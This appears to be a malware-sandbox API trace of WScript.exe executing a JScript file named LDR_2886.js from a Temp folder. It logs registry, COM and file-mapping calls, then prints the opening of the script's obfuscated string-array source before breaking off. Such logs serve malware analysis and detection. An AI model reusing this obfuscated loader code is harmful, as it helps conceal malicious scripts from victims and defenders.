	[0142.478] GetVersionExA (in: lpVersionInformation=0x31f680*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x501eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x31f680*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0142.478] GetUserDefaultLCID () returned 0x409
	[0142.478] CoInitialize (pvReserved=0x0) returned 0x0
	[0142.808] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0142.808] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0142.808] ??2@YAPEAX_K@Z () returned 0x4f57b0
	[0142.808] ??2@YAPEAX_K@Z () returned 0x4f5f60
	[0142.809] GetCurrentThreadId () returned 0xd54
	[0142.809] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x31f3c8 | out: phkResult=0x31f3c8*=0x7c) returned 0x0
	[0142.809] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x31f3c0 | out: phkResult=0x31f3c0*=0x80) returned 0x0
	[0142.809] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x31e6c8, lpData=0x31ead0, lpcbData=0x31e6c0*=0x400 | out: lpType=0x31e6c8*=0x0, lpData=0x31ead0*=0x67, lpcbData=0x31e6c0*=0x400) returned 0x2
	[0142.809] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x31e6c8, lpData=0x31ead0, lpcbData=0x31e6c0*=0x400 | out: lpType=0x31e6c8*=0x0, lpData=0x31ead0*=0x67, lpcbData=0x31e6c0*=0x400) returned 0x2
	[0142.809] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x31e6c8, lpData=0x31ead0, lpcbData=0x31e6c0*=0x400 | out: lpType=0x31e6c8*=0x0, lpData=0x31ead0*=0x67, lpcbData=0x31e6c0*=0x400) returned 0x2
	[0142.809] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0143.375] RegCloseKey (hKey=0x80) returned 0x0
	[0143.375] RegCloseKey (hKey=0x7c) returned 0x0
	[0143.375] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x31f0e0 | out: phkResult=0x31f0e0*=0x7c) returned 0x0
	[0143.375] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x31f0d8 | out: phkResult=0x31f0d8*=0x80) returned 0x0
	[0143.376] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x31e3e8, lpData=0x31e7f0, lpcbData=0x31e3e0*=0x400 | out: lpType=0x31e3e8*=0x0, lpData=0x31e7f0*=0x0, lpcbData=0x31e3e0*=0x400) returned 0x2
	[0143.376] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x31e3e8, lpData=0x31e7f0, lpcbData=0x31e3e0*=0x400 | out: lpType=0x31e3e8*=0x0, lpData=0x31e7f0*=0x0, lpcbData=0x31e3e0*=0x400) returned 0x2
	[0143.376] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x31e3e8, lpData=0x31e7f0, lpcbData=0x31e3e0*=0x400 | out: lpType=0x31e3e8*=0x0, lpData=0x31e7f0*=0x0, lpcbData=0x31e3e0*=0x400) returned 0x2
	[0143.376] RegCloseKey (hKey=0x80) returned 0x0
	[0143.376] RegCloseKey (hKey=0x7c) returned 0x0
	[0143.376] GetACP () returned 0x4e4
	[0143.376] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0143.376] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0143.376] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0143.376] FreeLibrary (hLibModule=0x77040000) returned 1
	[0143.376] ??2@YAPEAX_K@Z () returned 0x4f5f80
	[0143.377] CoRegisterMessageFilter (in: lpMessageFilter=0x4f5f80, lplpMessageFilter=0x4f5f90 | out: lplpMessageFilter=0x4f5f90*=0x0) returned 0x0
	[0143.377] GetModuleFileNameW (in: hModule=0xff1f0000, lpFilename=0x31f420, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0143.377] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x31ed70 | out: lpdwHandle=0x31ed70) returned 0x704
	[0143.378] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x31e660 | out: lpData=0x31e660) returned 1
	[0143.378] VerQueryValueW (in: pBlock=0x31e660, lpSubBlock="\\", lplpBuffer=0x31ed78, puLen=0x31ed74 | out: lplpBuffer=0x31ed78*=0x31e688, puLen=0x31ed74) returned 1
	[0143.378] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x31edc8 | out: phkResult=0x31edc8*=0x7c) returned 0x0
	[0143.378] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x31e118, lpData=0x31e520, lpcbData=0x31e110*=0x400 | out: lpType=0x31e118*=0x0, lpData=0x31e520*=0x0, lpcbData=0x31e110*=0x400) returned 0x2
	[0143.378] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x31ed80 | out: phkResult=0x31ed80*=0x80) returned 0x0
	[0143.378] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x31ed44, lpData=0x31edc0, lpcbData=0x31ed40*=0x4 | out: lpType=0x31ed44*=0x0, lpData=0x31edc0*=0xf0, lpcbData=0x31ed40*=0x4) returned 0x2
	[0143.378] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x31e118, lpData=0x31e520, lpcbData=0x31e110*=0x400 | out: lpType=0x31e118*=0x0, lpData=0x31e520*=0x0, lpcbData=0x31e110*=0x400) returned 0x2
	[0143.378] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x31ed44, lpData=0x31edc0, lpcbData=0x31ed40*=0x4 | out: lpType=0x31ed44*=0x0, lpData=0x31edc0*=0xf0, lpcbData=0x31ed40*=0x4) returned 0x2
	[0143.378] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x31e118, lpData=0x31e520, lpcbData=0x31e110*=0x400 | out: lpType=0x31e118*=0x1, lpData="1", lpcbData=0x31e110*=0x4) returned 0x0
	[0143.378] lstrlenW (lpString="1") returned 1
	[0143.378] lstrlenW (lpString="0") returned 1
	[0143.378] lstrlenW (lpString="1") returned 1
	[0143.378] lstrlenW (lpString="no") returned 2
	[0143.378] lstrlenW (lpString="1") returned 1
	[0143.378] lstrlenW (lpString="false") returned 5
	[0143.378] RegCloseKey (hKey=0x80) returned 0x0
	[0143.378] RegCloseKey (hKey=0x7c) returned 0x0
	[0143.378] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x31edc8, lpdwDisposition=0x0 | out: phkResult=0x31edc8*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0143.379] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x31ed64, lpData=0x31edc0, lpcbData=0x31ed60*=0x4 | out: lpType=0x31ed64*=0x0, lpData=0x31edc0*=0xf0, lpcbData=0x31ed60*=0x4) returned 0x2
	[0143.379] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x31e138, lpData=0x31e540, lpcbData=0x31e130*=0x400 | out: lpType=0x31e138*=0x1, lpData="1", lpcbData=0x31e130*=0x4) returned 0x0
	[0143.379] lstrlenW (lpString="1") returned 1
	[0143.379] lstrlenW (lpString="0") returned 1
	[0143.379] lstrlenW (lpString="1") returned 1
	[0143.379] lstrlenW (lpString="no") returned 2
	[0143.379] lstrlenW (lpString="1") returned 1
	[0143.379] lstrlenW (lpString="false") returned 5
	[0143.379] RegCloseKey (hKey=0x7c) returned 0x0
	[0143.379] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x31edc8, lpdwDisposition=0x0 | out: phkResult=0x31edc8*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0143.379] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x31ed64, lpData=0x31edc0, lpcbData=0x31ed60*=0x4 | out: lpType=0x31ed64*=0x0, lpData=0x31edc0*=0xf0, lpcbData=0x31ed60*=0x4) returned 0x2
	[0143.379] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x31e138, lpData=0x31e540, lpcbData=0x31e130*=0x400 | out: lpType=0x31e138*=0x0, lpData=0x31e540*=0x31, lpcbData=0x31e130*=0x400) returned 0x2
	[0143.379] RegCloseKey (hKey=0x7c) returned 0x0
	[0143.379] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0143.379] lstrlenW (lpString="js") returned 2
	[0143.379] lstrlenW (lpString="WSH") returned 3
	[0143.379] ??2@YAPEAX_K@Z () returned 0x4f5870
	[0143.379] LoadStringW (in: hInstance=0xff1f0000, uID=0x9c5, lpBuffer=0x31d830, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0143.380] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x31e870*=0x0 | out: pptlib=0x31e870*=0x52d100) returned 0x0
	[0143.386] ITypeLib:GetTypeInfoOfGuid (in: This=0x52d100, GUID=0xff1f58f0, ppTInfo=0x31e858 | out: ppTInfo=0x31e858*=0x52e4e8) returned 0x0
	[0143.387] ITypeInfo:GetRefTypeOfImplType (in: This=0x52e4e8, index=0xffffffff, pRefType=0x31e850 | out: pRefType=0x31e850*=0xfffffffe) returned 0x0
	[0143.387] ITypeInfo:GetRefTypeInfo (in: This=0x52e4e8, hreftype=0xfffffffe, ppTInfo=0xff20f458 | out: ppTInfo=0xff20f458*=0x52e540) returned 0x0
	[0143.387] IUnknown:Release (This=0x52e4e8) returned 0x1
	[0143.388] ??2@YAPEAX_K@Z () returned 0x4f5900
	[0143.388] ??2@YAPEAX_K@Z () returned 0x4f59a0
	[0143.388] ??2@YAPEAX_K@Z () returned 0x4f5a00
	[0143.388] ITypeLib:GetTypeInfoOfGuid (in: This=0x52d100, GUID=0xff1f5950, ppTInfo=0x31e858 | out: ppTInfo=0x31e858*=0x52e598) returned 0x0
	[0143.388] ITypeInfo:GetRefTypeOfImplType (in: This=0x52e598, index=0xffffffff, pRefType=0x31e850 | out: pRefType=0x31e850*=0xfffffffe) returned 0x0
	[0143.388] ITypeInfo:GetRefTypeInfo (in: This=0x52e598, hreftype=0xfffffffe, ppTInfo=0xff20f4d8 | out: ppTInfo=0xff20f4d8*=0x52e5f0) returned 0x0
	[0143.388] IUnknown:Release (This=0x52e598) returned 0x1
	[0143.388] ITypeLib:GetTypeInfoOfGuid (in: This=0x52d100, GUID=0xff1f5960, ppTInfo=0x31e858 | out: ppTInfo=0x31e858*=0x52e648) returned 0x0
	[0143.388] ITypeInfo:GetRefTypeOfImplType (in: This=0x52e648, index=0xffffffff, pRefType=0x31e850 | out: pRefType=0x31e850*=0xfffffffe) returned 0x0
	[0143.388] ITypeInfo:GetRefTypeInfo (in: This=0x52e648, hreftype=0xfffffffe, ppTInfo=0xff20f518 | out: ppTInfo=0xff20f518*=0x52e6a0) returned 0x0
	[0143.388] IUnknown:Release (This=0x52e648) returned 0x1
	[0143.388] ITypeLib:GetTypeInfoOfGuid (in: This=0x52d100, GUID=0xff1f5910, ppTInfo=0x31e858 | out: ppTInfo=0x31e858*=0x52e6f8) returned 0x0
	[0143.388] ITypeInfo:GetRefTypeOfImplType (in: This=0x52e6f8, index=0xffffffff, pRefType=0x31e850 | out: pRefType=0x31e850*=0xfffffffe) returned 0x0
	[0143.388] ITypeInfo:GetRefTypeInfo (in: This=0x52e6f8, hreftype=0xfffffffe, ppTInfo=0xff20f498 | out: ppTInfo=0xff20f498*=0x52e750) returned 0x0
	[0143.388] IUnknown:Release (This=0x52e6f8) returned 0x1
	[0143.388] IUnknown:Release (This=0x52d100) returned 0x4
	[0143.388] ??2@YAPEAX_K@Z () returned 0x4f5a60
	[0143.388] GetCurrentThreadId () returned 0xd54
	[0143.388] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0143.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff201cf8, lpParameter=0x4f5a60, dwCreationFlags=0x0, lpThreadId=0x4f5a88 | out: lpThreadId=0x4f5a88*=0xd68) returned 0xd4
	[0143.389] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x31eab0*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0143.503] CloseHandle (hObject=0xcc) returned 1
	[0143.503] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x31eb40, lpFilePart=0x31eb30 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x31eb30*="LDR_2886.js") returned 0x30
	[0143.503] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x31e050 | out: phkResult=0x31e050*=0xe6) returned 0x0
	[0143.504] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x31e000, lpData=0x31e060, lpcbData=0x31e004*=0x800 | out: lpType=0x31e000*=0x1, lpData="JSFile", lpcbData=0x31e004*=0xe) returned 0x0
	[0143.504] RegCloseKey (hKey=0xe6) returned 0x0
	[0143.504] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x31e050 | out: phkResult=0x31e050*=0xe6) returned 0x0
	[0143.504] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x31e000, lpData=0x31e8d0, lpcbData=0x31e004*=0x200 | out: lpType=0x31e000*=0x1, lpData="JScript", lpcbData=0x31e004*=0x10) returned 0x0
	[0143.504] RegCloseKey (hKey=0xe6) returned 0x0
	[0143.504] ??2@YAPEAX_K@Z () returned 0x4f63a0
	[0143.504] GetProcessHeap () returned 0x500000
	[0143.504] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x538430
	[0143.504] CLSIDFromString (in: lpsz="JScript", pclsid=0x31e848 | out: pclsid=0x31e848*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0143.505] CoCreateInstance (rclsid=0x31e848*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff1f1800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x31e840) 
	[0143.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31ca40 | out: lpSystemTimeAsFileTime=0x31ca40*(dwLowDateTime=0xcdabfc20, dwHighDateTime=0x1d543d1)) 
	[0143.531] GetCurrentProcessId () returned 0xd50
	[0143.531] GetCurrentThreadId () returned 0xd54
	[0143.531] GetTickCount () returned 0x34114
	[0143.531] QueryPerformanceCounter (in: lpPerformanceCount=0x31ca48 | out: lpPerformanceCount=0x31ca48*=26795707496) returned 1
	[0143.531] malloc (_Size=0x100) returned 0x4f6670
	[0143.531] __dllonexit () returned 0x7feddf70728
	[0143.532] __dllonexit () returned 0x7feddf70780
	[0143.532] __dllonexit () returned 0x7feddf70750
	[0143.532] __dllonexit () returned 0x7feddf707b0
	[0143.532] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0143.532] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0143.532] EtwRegisterTraceGuidsA () returned 0x0
	[0143.532] EtwRegisterTraceGuidsA () returned 0x0
	[0143.532] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x31c630, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0143.533] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0143.533] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x31c798 | out: phkResult=0x31c798*=0x0) returned 0x2
	[0143.543] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x31e778 | out: phkResult=0x31e778*=0x104) returned 0x0
	[0143.543] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegQueryValueExA") returned 0x7fefd72c480
	[0143.543] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x31e770, lpData=0x31e768, lpcbData=0x31e760*=0x4 | out: lpType=0x31e770*=0x4, lpData=0x31e768*=0x1, lpcbData=0x31e760*=0x4) returned 0x0
	[0143.543] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0143.543] RegCloseKey (hKey=0x104) returned 0x0
	[0143.543] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0143.544] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0143.544] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0143.544] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
	[0143.544] CoCreateInstance (in: rclsid=0x7feddfdcba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7feddfdcd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x31e740 | out: ppv=0x31e740*=0x7fefec0a1b0) returned 0x0
	[0143.545] ??2@YAPEAX_K@Z () returned 0x4f6b30
	[0143.545] ??2@YAPEAX_KHPEBDH@Z () returned 0x4f5af0
	[0143.545] ??2@YAPEAX_K@Z () returned 0x4f6bf0
	[0143.545] ??2@YAPEAX_K@Z () returned 0x4f6c50
	[0143.546] ??2@YAPEAX_K@Z () returned 0x4f7140
	[0143.546] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x31e700, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0143.546] GetUserDefaultLCID () returned 0x409
	[0143.546] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0143.546] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x31e7a0, cchData=6 | out: lpLCData="1252") returned 5
	[0143.546] IsValidCodePage (CodePage=0x4e4) returned 1
	[0143.546] CoCreateInstance (in: rclsid=0x7feddfd5d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7feddfd5d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x4f6af0 | out: ppv=0x4f6af0*=0x5375b0) returned 0x0
	[0143.546] IUnknown:AddRef (This=0x5375b0) returned 0x2
	[0143.546] GetCurrentProcessId () returned 0xd50
	[0143.546] GetCurrentThreadId () returned 0xd54
	[0143.546] GetTickCount () returned 0x34124
	[0143.546] ISystemDebugEventFire:BeginSession (This=0x5375b0, guidSourceID=0x7feddfd5da8, strSessionName="JScript:00003408:00003412:18213284") returned 0x0
	[0143.546] GetCurrentThreadId () returned 0xd54
	[0143.546] ??2@YAPEAX_K@Z () returned 0x4f71e0
	[0143.546] ??2@YAPEAX_K@Z () returned 0x4f7230
	[0143.546] malloc (_Size=0x80) returned 0x4f72e0
	[0143.546] malloc (_Size=0x108) returned 0x4f7370
	[0143.546] GetTickCount () returned 0x34124
	[0143.547] GetCurrentThreadId () returned 0xd54
	[0143.547] ??2@YAPEAX_K@Z () returned 0x4f7480
	[0143.547] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0143.547] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0143.547] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0143.547] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x210000
	[0143.547] GetVersionExA (in: lpVersionInformation=0x31e950*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x31e950*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0143.547] IsTextUnicode (in: lpv=0x210000, iSize=19304, lpiResult=0x31e940 | out: lpiResult=0x31e940) returned 0
	[0143.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x210000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0143.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x210000, cbMultiByte=19304, lpWideCharStr=0x53f978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRc